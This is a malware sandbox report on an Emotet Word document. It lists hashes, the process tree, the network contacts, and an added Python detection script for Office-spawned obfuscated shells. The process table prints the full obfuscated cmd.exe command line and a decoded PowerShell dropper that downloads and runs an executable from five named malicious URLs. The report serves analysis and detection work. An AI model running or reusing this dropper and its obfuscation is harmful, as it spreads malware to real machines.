File name: | sample.doc |
Full analysis: | https://app.any.run/tasks/3660f59d-7a31-497b-8338-b295ff1d70c5 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | January 17, 2019, 19:42:50 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Jan 15 12:26:00 2019, Last Saved Time/Date: Tue Jan 15 12:26:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 3, Security: 0 |
MD5: | 0F73FB479DB4FF15AB386771770C8FD7 |
SHA1: | 5317F63C3AEE3D88005BE1E21A6C410C041A5C21 |
SHA256: | 41F18EF5935884B4B39BAC9C5751CC67B92C2516AB71A6885F92D5BCCA7AD4D0 |
SSDEEP: | 3072:H38GhDS0o9zTGOZD6EbzCdhbt+tvorTwFqS8:HtoUOZDlbehbKU |
Extension | Identified type (match %)
---|---
.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)
Title: | - |
---|---|
Subject: | - |
Author: | - |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2019:01:15 12:26:00 |
ModifyDate: | 2019:01:15 12:26:00 |
Pages: | 1 |
Words: | - |
Characters: | 3 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 3 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: | - |
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process | Details
---|---|---|---|---|---
2824 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\sample.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Word; Version: 14.0.6024.1000
4032 | "C:\Windows\system32\cmd.exe" /c %PROGRAmdaTA:~0,1%%pRograMData:~9,2% /V /c " sET 6AI=pod^%PUBLIC:~],1^%r^%SESSIONNAME:~-4,1^%h^%}EMP:~-3,1^%ll $Californiara='MoviesOut8oorssp'?$metho8ologyjj=ned-o`je;t Net.We`Client?$PersonalLoanA;;ountha='http://ddd.unitepro.mpG/PyZ}G;_yPRHBR0pG_ik0a#}hjhttp://ddd.nkalitin.ru/3ghp_#E]B]_77azuhjhttp://ddd.jessie-equitation.fr/DLA4Nn9_HBR736_ajRO}yhjhttp://ddd.li8stroy.ru/a8f8l_tnv#5CChjhttp://ddd.kartonaza-hu8etz.hr/LER5Ip_zNpGmr_9A26'.Split('hj')?$8epositp8='Be8for8shiredj'?$In;re8i`leqm = ']09'?$`ran8`u='Liaisonjj'?$}oolsIn8ustrialBooksit=$env:pu`li;+'\'+$In;re8i`leqm+'.epGe'?forea;h($hapti;om in $PersonalLoanA;;ountha)xtryx$metho8ologyjj.5odnloa8#ile($hapti;om, $}oolsIn8ustrialBooksit)?$Sdiss#ran;zh='`luetoothio'?If ((Get-Item $}oolsIn8ustrialBooksit).length -ge o00000) xInvoke-Item $}oolsIn8ustrialBooksit?$supply;hainsoh=';ompressinghz'?`reak?[[;at;hx[[$#ordar8ji='in8epGingj8'?&& SeT d6Fw=!6AI:hj=@!&& seT O3A=!d6Fw:x={!& SeT u87E=!O3A:HBR=X!&& sET OL=!u87E:;=c!&sET pGDP=!OL:pG=x!&& seT F46b=!pGDP:?=;!&SeT FH0K=!F46b:DLA=H!& sET gz=!FH0K:d=w!& SET 4WcY=!gz:8=d!& Set v2p=!4WcY:#=F!& set uLd=!v2p:o0=8!&& set Z8=!uLd:5=D!&& set 1Hul=!Z8:`=b!&& Set fK=!1Hul:]=5!&sEt puQY=!fK:}=T!& SET VA=!puQY:[=}!&echO %VA% | C%TEMp:~-2,-1%%aLLuSerSprOFIle:~10,1% " | C:\Windows\system32\cmd.exe | — | WINWORD.EXE | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 0; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
2540 | CmD /V /c " sET 6AI=pod^%PUBLIC:~],1^%r^%SESSIONNAME:~-4,1^%h^%}EMP:~-3,1^%ll $Californiara='MoviesOut8oorssp'?$metho8ologyjj=ned-o`je;t Net.We`Client?$PersonalLoanA;;ountha='http://ddd.unitepro.mpG/PyZ}G;_yPRHBR0pG_ik0a#}hjhttp://ddd.nkalitin.ru/3ghp_#E]B]_77azuhjhttp://ddd.jessie-equitation.fr/DLA4Nn9_HBR736_ajRO}yhjhttp://ddd.li8stroy.ru/a8f8l_tnv#5CChjhttp://ddd.kartonaza-hu8etz.hr/LER5Ip_zNpGmr_9A26'.Split('hj')?$8epositp8='Be8for8shiredj'?$In;re8i`leqm = ']09'?$`ran8`u='Liaisonjj'?$}oolsIn8ustrialBooksit=$env:pu`li;+'\'+$In;re8i`leqm+'.epGe'?forea;h($hapti;om in $PersonalLoanA;;ountha)xtryx$metho8ologyjj.5odnloa8#ile($hapti;om, $}oolsIn8ustrialBooksit)?$Sdiss#ran;zh='`luetoothio'?If ((Get-Item $}oolsIn8ustrialBooksit).length -ge o00000) xInvoke-Item $}oolsIn8ustrialBooksit?$supply;hainsoh=';ompressinghz'?`reak?[[;at;hx[[$#ordar8ji='in8epGingj8'?&& SeT d6Fw=!6AI:hj=@!&& seT O3A=!d6Fw:x={!& SeT u87E=!O3A:HBR=X!&& sET OL=!u87E:;=c!&sET pGDP=!OL:pG=x!&& seT F46b=!pGDP:?=;!&SeT FH0K=!F46b:DLA=H!& sET gz=!FH0K:d=w!& SET 4WcY=!gz:8=d!& Set v2p=!4WcY:#=F!& set uLd=!v2p:o0=8!&& set Z8=!uLd:5=D!&& set 1Hul=!Z8:`=b!&& Set fK=!1Hul:]=5!&sEt puQY=!fK:}=T!& SET VA=!puQY:[=}!&echO %VA% | CmD " | C:\Windows\system32\cmd.exe | — | cmd.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 0; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
2816 | C:\Windows\system32\cmd.exe /S /D /c" echO %VA% " | C:\Windows\system32\cmd.exe | — | cmd.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 0; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
2924 | CmD | C:\Windows\system32\cmd.exe | — | cmd.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 0; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850)
3396 | powershell $Californiara='MoviesOutdoorssp';$methodologyjj=new-object Net.WebClient;$PersonalLoanAccountha='http://www.unitepro.mx/PyZTGc_yPRX0x_ik0aFT@http://www.nkalitin.ru/3ghp_FE5B5_77azu@http://www.jessie-equitation.fr/H4Nn9_X736_ajROTy@http://www.lidstroy.ru/adfdl_tnvFDCC@http://www.kartonaza-hudetz.hr/LERDIp_zNxmr_9A26'.Split('@');$depositpd='Bedfordshirewj';$Incredibleqm = '509';$brandbu='Liaisonjj';$ToolsIndustrialBooksit=$env:public+'\'+$Incredibleqm+'.exe';foreach($hapticom in $PersonalLoanAccountha){try{$methodologyjj.DownloadFile($hapticom, $ToolsIndustrialBooksit);$SwissFranczh='bluetoothio';If ((Get-Item $ToolsIndustrialBooksit).length -ge 80000) {Invoke-Item $ToolsIndustrialBooksit;$supplychainsoh='compressinghz';break;}}catch{}}$Forwardji='indexingjd'; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255)
2432 | "C:\Windows\system32\ntvdm.exe" -i1 | C:\Windows\system32\ntvdm.exe | — | powershell.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: NTVDM.EXE; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255)
PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---
2824 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR6A63.tmp.cvr | — | — | —
2824 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1CE8185D.wmf | — | — | —
2824 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2D6AE773.wmf | — | — | —
3396 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QE7Z0HUXEIBRQ39QOPKI.temp | — | — | —
2432 | ntvdm.exe | C:\Users\admin\AppData\Local\Temp\scs7CC2.tmp | — | — | —
2432 | ntvdm.exe | C:\Users\admin\AppData\Local\Temp\scs7CC3.tmp | — | — | —
3396 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 6073B6FC66D2E68644893344F6904E4A | 0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3
2824 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | B8FCEAA6B5CB7429D3318E10A21A8DBC | 2548941F28EBB3CBAEC4DA56907E3CE7AD16E62FFD5F2C1C2C46BA3D4E664F2A
3396 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF247540.TMP | binary | 6073B6FC66D2E68644893344F6904E4A | 0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3
3396 | powershell.exe | C:\Users\Public\509.exe | document | 36DF9616987F412949FEE98EA9F06C97 | C2E393FF568F4A87CE48011F10664138E569710F56DDC0462AA7F36BDAD5ECAD
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3396 | powershell.exe | GET | 404 | 75.126.5.21:80 | http://www.unitepro.mx/PyZTGc_yPRX0x_ik0aFT | US | html | 337 b | suspicious |
3396 | powershell.exe | GET | 301 | 213.186.33.3:80 | http://www.jessie-equitation.fr/H4Nn9_X736_ajROTy | FR | html | 258 b | malicious |
3396 | powershell.exe | GET | 403 | 185.26.122.73:80 | http://www.nkalitin.ru/3ghp_FE5B5_77azu | RU | html | 1.14 Kb | malicious |
3396 | powershell.exe | GET | 200 | 213.186.33.3:80 | http://www.jessie-equitation.fr/H4Nn9_X736_ajROTy/ | FR | document | 124 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3396 | powershell.exe | 213.186.33.3:80 | www.jessie-equitation.fr | OVH SAS | FR | malicious |
3396 | powershell.exe | 75.126.5.21:80 | www.unitepro.mx | SoftLayer Technologies Inc. | US | suspicious |
3396 | powershell.exe | 185.26.122.73:80 | www.nkalitin.ru | Hostland LTD | RU | malicious |
Domain | IP | Reputation
---|---|---
www.unitepro.mx | — | suspicious
www.nkalitin.ru | — | malicious
www.jessie-equitation.fr | — | malicious
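What a detection engineer takes from the process table is the lineage and the shape of the command lines rather than their decoded content: an Office process spawning cmd.exe, which spawns further cmd.exe instances and finally powershell.exe, with command lines built from `%VAR:~start,len%` character picking and `!VAR:old=new!` rewriting under `cmd /V`. The following Python is an added example, not part of the ANY.RUN report, that runs exactly that check over process rows transcribed from the table. Parent PIDs are assumptions derived from the parent names (the report prints only names, and explorer.exe gets a made-up PID), and the long command lines are cut down to the parts the rules examine.

```python
import re
from collections import namedtuple

Proc = namedtuple("Proc", "pid ppid image cmdline")

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}
SUBSTR_REF = re.compile(r"%\w+:~")               # %VAR:~start,len% character picking
DELAYED_SUB = re.compile(r"!\w+:[^=!]+=[^!]*!")   # !VAR:old=new! rewriting with cmd /V

# Process rows transcribed from the report. Parent PIDs are ASSUMED from the parent
# names printed in the table (explorer.exe gets a made-up PID 1000), and the long
# command lines are cut to the part the rules look at.
REPORT = [
    Proc(1000, 0, "explorer.exe", "explorer.exe"),
    Proc(2824, 1000, "WINWORD.EXE",
         r'"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\sample.doc"'),
    Proc(4032, 2824, "cmd.exe",
         r'"C:\Windows\system32\cmd.exe" /c %PROGRAmdaTA:~0,1%%pRograMData:~9,2% /V /c " sET 6AI=pod^%PUBLIC:~],1^%r^%SESSIONNAME:~-4,1^%h ...'),
    Proc(2540, 4032, "cmd.exe",
         'CmD /V /c " sET 6AI=pod^%PUBLIC:~],1^% ... && SeT d6Fw=!6AI:hj=@!&& seT O3A=!d6Fw:x={! ... &echO %VA% | CmD "'),
    Proc(2816, 2540, "cmd.exe", r'C:\Windows\system32\cmd.exe /S /D /c" echO %VA% "'),
    Proc(2924, 2540, "cmd.exe", "CmD"),
    Proc(3396, 2924, "powershell.exe",
         "powershell $Californiara='MoviesOutdoorssp';$methodologyjj=new-object Net.WebClient; ..."),
    Proc(2432, 3396, "ntvdm.exe", r'"C:\Windows\system32\ntvdm.exe" -i1'),
]


def ancestors(proc, by_pid):
    """Parent chain of proc, nearest first; stops at the root, a missing parent or a PID loop."""
    seen, parent = set(), by_pid.get(proc.ppid)
    while parent is not None and parent.pid not in seen:
        seen.add(parent.pid)
        yield parent
        parent = by_pid.get(parent.ppid)


def detect(procs):
    """Map pid -> reasons, for shells descended from an Office process and for
    command lines that use cmd.exe environment-variable obfuscation."""
    by_pid = {p.pid: p for p in procs}
    findings = {}
    for p in procs:
        reasons = []
        if p.image.lower() in SHELLS:
            chain = [a.image for a in ancestors(p, by_pid)]
            if any(a.lower() in OFFICE for a in chain):
                reasons.append("shell descended from Office: " + " <- ".join([p.image] + chain))
        # one %VAR:~n,m% is normal scripting; two or more, or any !VAR:a=b! chain, is not
        if len(SUBSTR_REF.findall(p.cmdline)) >= 2 or DELAYED_SUB.search(p.cmdline):
            reasons.append("cmd.exe %VAR:~n,m% / !VAR:a=b! obfuscation in command line")
        if reasons:
            findings[p.pid] = reasons
    return findings


if __name__ == "__main__":
    for pid, reasons in detect(REPORT).items():
        print(pid, *reasons, sep="\n  ")
```

The two rules are independent on purpose: the lineage rule fires on every cmd.exe and powershell.exe under WINWORD.EXE here, including the trivial `CmD` and `echO %VA%` helpers, while the obfuscation rule fires on PIDs 4032 and 2540 regardless of parent. Sysmon event ID 1 carries the same three fields (Image, ParentImage, CommandLine), so the logic transfers directly to live telemetry; the `-ge 80000` size check and the `$env:public` drop path from the decoded script are further string indicators that survive the obfuscation layer only after decoding, which is why the command-line shape, not the payload, is the robust signal.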